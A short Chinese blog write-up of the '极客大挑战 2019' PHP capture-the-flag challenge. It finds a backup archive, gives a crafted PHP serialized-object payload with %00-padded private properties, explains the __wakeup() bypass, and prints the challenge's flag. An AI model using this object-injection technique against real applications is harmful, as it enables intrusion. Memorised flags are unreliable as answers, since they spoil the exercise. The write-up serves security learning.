[极客大挑战 2019]PHP
[极客大挑战 2019]PHP
PHP序列化与反序列化(__sleep 与__wakeup)_php7.4.33反序列化wakeup-CSDN博客
挺好看的前端(
dirbuster 扫了一下,找到 www.zip 备份文件,下过来看一下,flag.php 里的 flag 就是个数据,不是 flag。看到 index.php 里给了一个反序列化,尝试构造 $select。
审一下 draft.php,先把序列化的值摸出来:
$a= new Name('admin',100);
echo serialize($a);
得到 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}。
因为 username 和 password 都是 private,补一下符号:
O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
发现 username 不对,接着修改字符串属性,绕过 __wakeup() 方法,即得到 flag{10f9c45e-ce54-47e6-a785-a4e7f18a7ec2}
本文来自博客园,作者:Maplisky,转载请注明原文链接:https://www.cnblogs.com/lbh2021/p/18566628
浙公网安备 33010602011771号